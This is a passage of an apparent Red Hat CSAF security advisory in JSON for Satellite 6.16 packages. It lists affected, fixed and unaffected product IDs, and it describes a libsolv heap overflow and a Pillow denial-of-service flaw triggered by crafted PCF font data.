"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libsolv: Heap buffer overflow in libsolv repopagestore via unchecked decompression of malicious .solv page data"
},
{
"cve": "CVE-2026-54059",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-07-06T20:02:21.640821+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497464"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing specially crafted PCF font data. This data, when processed, can lead to excessive memory allocation because the library does not properly check for decompression bombs. The primary consequence is a Denial of Service (DoS), which could make the affected system or application unavailable.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted PCF font data",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in the Python Pillow library. The PcfFontFile._load_bitmaps() method reads glyph dimensions from the PCF METRICS section and passes them directly to Image.frombytes() without calling Image._decompression_bomb_check(). This allows crafted PCF font data to cause excessive memory allocation, leading to a denial of service condition. An attacker could exploit this by providing a specially crafted PCF font file to an application that uses Pillow\u0027s font loading functionality.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64"
],
"known_not_affected": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
